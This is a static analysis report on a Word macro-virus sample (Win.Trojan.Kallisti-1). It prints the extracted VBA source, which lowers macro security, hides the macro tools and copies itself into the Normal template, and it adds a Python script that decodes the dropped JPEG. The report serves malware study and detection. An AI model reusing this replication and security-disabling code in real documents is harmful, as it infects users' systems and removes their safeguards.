Win.Trojan.Kallisti-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 841ad0ebc113c60c…

MALICIOUS

Office (OLE)

Size: 112.5 KB · Created: 2003-07-16 00:07:00 · Authoring application: Microsoft Word 10.0 · First seen: 2012-06-14
MD5: da0bd60206ae8074cb3c00a7b276c7db
SHA-1: f2b90ca7a46a09f56d5fab6a0a647757aef53ad2
SHA-256: 841ad0ebc113c60cab21d497338bf4752803a2851653605ab794de606ddaf418
Risk Score: 248

Malware Insights

Win.Trojan.Kallisti-1 · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample contains a VBA macro whose document_open handler runs each time the document is opened. It first derives the constants 1 and 0 from arithmetic (Pervone = VBA.Int(99) - VBA.Fix(98), Pervnul = VBA.Fix(99) - VBA.Int(99)) so that no literal 1 or 0 appears in the source, then lowers macro security for the detected Word version: on Word 97 (8.0) it clears Options.VirusProtection; on Word 2000 (9.0) and Word 2002 (10.0) it writes HKEY_CURRENT_USER\Software\Microsoft\Office\<version>\Word\Security\Level = 1 (Low) through System.PrivateProfileString, and on 10.0 it also sets AccessVBOM = 1 (trust access to the VBA project), calling WordBasic.FileExit, presumably so the new value is read at the next start. It then hides the Tools > Macro menu entries, disables Alt+F11 and Alt+F8, suppresses alerts and the Cancel key, and copies its own module source (CodeModule.Lines) into the VBA project of the other container, Normal template or active document, after clearing that file's attributes so the write succeeds: the self-replication routine of a classic Word macro virus. On the 15th of the month it writes a DEBUG.EXE script (an N PVRT.JPG line followed by E <address> <hex bytes> lines) to %WINDIR%\PVRT.INI; the visible hex encodes the start of a JFIF image. The Shell() call reported by the heuristics (OLE_VBA_SHELL) lies past the truncated preview, so the execution step and any downloaded or dropped executable are not visible here, and a downloader role should not be inferred from this preview alone. The ClamAV detection name Win.Trojan.Kallisti-1 supports the malicious verdict.

Heuristics (7)

  • ClamAV: Win.Trojan.Kallisti-1 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Trojan.Kallisti-1
  • VBA macros detected (medium, OLE_VBA_MACROS; 4 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in the VBA source; the call itself is not within the truncated preview shown below
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    Document_Open auto-execution handler (document_open in the recovered source)
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) (low, OLE_VBA_ENVIRON)
    Environ("Windir") is used to build the %WINDIR%\PVRT.INI drop path
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. (Generic rule text: for this sample a VBA project was in fact recovered as macros.bas under Extracted artifacts, so treat this finding as secondary evidence here.)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

  Filename    Kind       Source                                               Size
  macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  44839 bytes
  SHA-256: 72550590b078c65da35642f06f4e297da08efba719c2ec4681a0c23f82dc542b

Preview of the extracted script (first 1,000 lines; the listing below is cut off partway through the DEBUG script)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Attribute VB_Name = "ThisDocument1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub document_open()
Pervone = VBA.Int(99) - VBA.Fix(98)
Pervnul = VBA.Fix(99) - VBA.Int(99)
If Application.Version = "8.0" Then
With Options
.VirusProtection = Pervnul
End With
End If

If Application.Version = "9.0" Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
CommandBars("Macro").Controls("Security...").Visible = Pervnul
CommandBars("Macro").Controls("Visual Basic Editor").Visible = Pervnul
CommandBars("Macro").Controls("Macros...").Visible = Pervnul
End If

If Application.Version = "10.0" Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") <> 1& Then
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "AccessVBOM") = 1&
WordBasic.FileExit dlg
End If
CommandBars("Macro").Controls("Security...").Visible = Pervnul
CommandBars("Macro").Controls("Visual Basic Editor").Visible = Pervnul
CommandBars("Macro").Controls("Macros...").Visible = Pervnul
End If

With Options
.ConfirmConversions = Pervnul
End With
With Application
.DisplayAlerts = wdAlertsNone
.EnableCancelKey = wdCancelDisabled
End With

FindKey(KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11)).Disable
FindKey(KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF8)).Disable

CommandBars("Tools").Controls("Templates and Add-Ins...").Visible = Pervnul
CommandBars("Tools").Controls("Customize...").Visible = Pervnul

ourcode = MacroContainer.VBProject.VBComponents(Pervone).CodeModule.lines(Pervone, 1000)
If MacroContainer = NormalTemplate Then Set Target = ActiveDocument
If MacroContainer = ActiveDocument Then Set Target = NormalTemplate
If Target.Saved = Pervone Then
If VBA.GetAttr(Target.FullName) <> Pervnul Then
VBA.SetAttr Target.FullName, Pervnul
End If
End If
ü = 1

With Target.VBProject.VBComponents(Pervone)
.CodeModule.DeleteLines Pervone, .CodeModule.CountOfLines
.CodeModule.InsertLines Pervone, ourcode
End With

If Day(Now()) = (Pervone * 15) Then
Open Environ("Windir") & "\PVRT.INI" For Output As #1
Print #1, "N PVRT.JPG"
Print #1, "E 0100 FF D8 FF E0 00 10 4A 46 49 46 00 01 02 02 00 00"
Print #1, "E 0110 00 00 00 00 FF FE 00 1E 41 43 44 20 53 79 73 74"
Print #1, "E 0120 65 6D 73 20 44 69 67 69 74 61 6C 20 49 6D 61 67"
Print #1, "E 0130 69 6E 67 00 FF C0 00 11 08 01 00 01 80 03 01 22"
Print #1, "E 0140 00 02 11 01 03 11 01 FF DB 00 84 00 14 0D 0F 11"
Print #1, "E 0150 0F 0C 14 11 10 11 16 15 14 17 1E 32 20 1E 1B 1B"
Print #1, "E 0160 1E 3D 2B 2E 24 32 48 3F 4C 4B 47 3F 46 44 50 5A"
Print #1, "E 0170 73 61 50 55 6C 56 44 46 64 88 65 6C 76 7A 80 82"
Print #1, "E 0180 80 4D 60 8D 97 8C 7D 96 73 7E 80 7B 01 1F 21 21"
Print #1, "E 0190 2D 27 2D 58 30 30 58 B9 7B 69 7B B9 B9 B9 B9 B9"
Print #1, "E 01A0 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9"
Print #1, "E 01B0 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9"
Print #1, "E 01C0 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 FF C4 00"
Print #1, "E 01D0 83 00 00 03 01 01 01 01 01 00 00 00 00 00 00 00"
Print #1, "E 01E0 00 00 02 03 04 01 05 00 06 07 10 00 02 02 01 03"
Print #1, "E 01F0 03 02 04 04 04 05 03 05 01 01 00 01 02 00 11 03"
Print #1, "E 0200 04 12 21 31 41 51 13 61 05 22 71 81 32 42 91 A1"
Print #1, "E 0210 14 52 C1 F0 23 72 B1 D1 E1 33 62 92 15 34 43 82"
Print #1, "E 0220 
... (truncated)
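To see what the Day(Now()) = 15 branch actually drops, the DEBUG script can be replayed offline. The following Python is an added example, not code from the page or from any tool it names: it reimplements only the N and E commands of the DEBUG.EXE script format (with the assumed default load base CS:0100, so file offset = address - 0x100), rebuilds the file prefix from the Print #1 lines visible above, and walks the JPEG marker segments to read the JFIF APP0, the COM text and the SOF0 geometry. The constructed input is copied from the preview, which stops inside the "E 0220" line; the RCX/W/Q commands a complete script would need to write the file are not on the page and are not assumed.

```python
from typing import Dict, List, Tuple

# Constructed input: the visible DEBUG.EXE script lines written to %WINDIR%\PVRT.INI.
PVRT_INI = """\
N PVRT.JPG
E 0100 FF D8 FF E0 00 10 4A 46 49 46 00 01 02 02 00 00
E 0110 00 00 00 00 FF FE 00 1E 41 43 44 20 53 79 73 74
E 0120 65 6D 73 20 44 69 67 69 74 61 6C 20 49 6D 61 67
E 0130 69 6E 67 00 FF C0 00 11 08 01 00 01 80 03 01 22
E 0140 00 02 11 01 03 11 01 FF DB 00 84 00 14 0D 0F 11
E 0150 0F 0C 14 11 10 11 16 15 14 17 1E 32 20 1E 1B 1B
E 0160 1E 3D 2B 2E 24 32 48 3F 4C 4B 47 3F 46 44 50 5A
E 0170 73 61 50 55 6C 56 44 46 64 88 65 6C 76 7A 80 82
E 0180 80 4D 60 8D 97 8C 7D 96 73 7E 80 7B 01 1F 21 21
E 0190 2D 27 2D 58 30 30 58 B9 7B 69 7B B9 B9 B9 B9 B9
E 01A0 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9
E 01B0 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9
E 01C0 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 B9 FF C4 00
E 01D0 83 00 00 03 01 01 01 01 01 00 00 00 00 00 00 00
E 01E0 00 00 02 03 04 01 05 00 06 07 10 00 02 02 01 03
E 01F0 03 02 04 04 04 05 03 05 01 01 00 01 02 00 11 03
E 0200 04 12 21 31 41 51 13 61 05 22 71 81 32 42 91 A1
E 0210 14 52 C1 F0 23 72 B1 D1 E1 33 62 92 15 34 43 82
"""

DEBUG_LOAD_BASE = 0x100  # DEBUG.EXE keeps file data at CS:0100 (assumed default), so file offset = address - 0x100


def parse_debug_script(text: str) -> Tuple[str, bytes]:
    """Replay the N (name) and E (enter bytes) commands and return (filename, file image).
    Addresses never written are zero-filled; RCX/W/Q only control the write and are ignored."""
    filename = ""
    image = bytearray()
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        cmd, _, rest = line.partition(" ")
        cmd = cmd.upper()
        if cmd == "N":
            filename = rest.strip()
        elif cmd == "E":
            addr_hex, *hex_bytes = rest.split()
            offset = int(addr_hex, 16) - DEBUG_LOAD_BASE
            if offset < 0:
                raise ValueError(f"address below load base: {addr_hex}")
            chunk = bytes(int(h, 16) for h in hex_bytes)
            end = offset + len(chunk)
            if len(image) < end:
                image.extend(b"\x00" * (end - len(image)))
            image[offset:end] = chunk
    return filename, bytes(image)


JPEG_MARKERS = {0xC0: "SOF0", 0xC4: "DHT", 0xDA: "SOS", 0xDB: "DQT", 0xDD: "DRI", 0xE0: "APP0", 0xFE: "COM"}


def walk_jpeg(data: bytes) -> List[Tuple[str, int, int]]:
    """Return (segment name, offset, declared length) for each segment that fits in data.
    Stops at SOS (entropy-coded data follows) or at the first segment the truncation cuts off."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("no SOI marker: not a JPEG")
    segments = [("SOI", 0, 0)]
    pos = 2
    while pos + 4 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        name = JPEG_MARKERS.get(marker, f"0x{marker:02X}")
        length = int.from_bytes(data[pos + 2:pos + 4], "big")  # length covers itself, not the marker
        if pos + 2 + length > len(data):
            segments.append((name + " (truncated)", pos, length))
            break
        segments.append((name, pos, length))
        if marker == 0xDA:
            break
        pos += 2 + length
    return segments


def triage_jpeg(data: bytes) -> Dict[str, object]:
    """Pull the analyst-relevant fields out of the segments: APP0 identifier, COM text, SOF0 geometry."""
    segments = walk_jpeg(data)
    info: Dict[str, object] = {"segments": [name for name, _, _ in segments]}
    for name, off, length in segments:
        payload = data[off + 4:off + 2 + length]  # skip the 2-byte marker and 2-byte length
        if name == "APP0":
            info["app0_id"] = payload[:5]
        elif name == "COM":
            info["comment"] = payload.rstrip(b"\x00").decode("latin-1")
        elif name == "SOF0":
            info["precision"] = payload[0]
            info["height"] = int.from_bytes(payload[1:3], "big")
            info["width"] = int.from_bytes(payload[3:5], "big")
            info["components"] = payload[5]
    return info


if __name__ == "__main__":
    name, blob = parse_debug_script(PVRT_INI)
    print(f"{name}: {len(blob)} bytes recovered from the visible E lines")
    print(triage_jpeg(blob))
```

Run on the visible prefix this yields PVRT.JPG: a 384x256 three-component baseline JPEG with the comment "ACD Systems Digital Imaging", cut off inside its DHT segment. On the evidence of this preview the drop is therefore an image, not an executable; what the macro does with it afterwards, including the Shell() call the heuristics report, lies beyond the truncation. Note also that DEBUG.EXE is a 16-bit tool absent from 64-bit Windows, so this drop fails outright on a modern host even though the registry and self-replication steps still run.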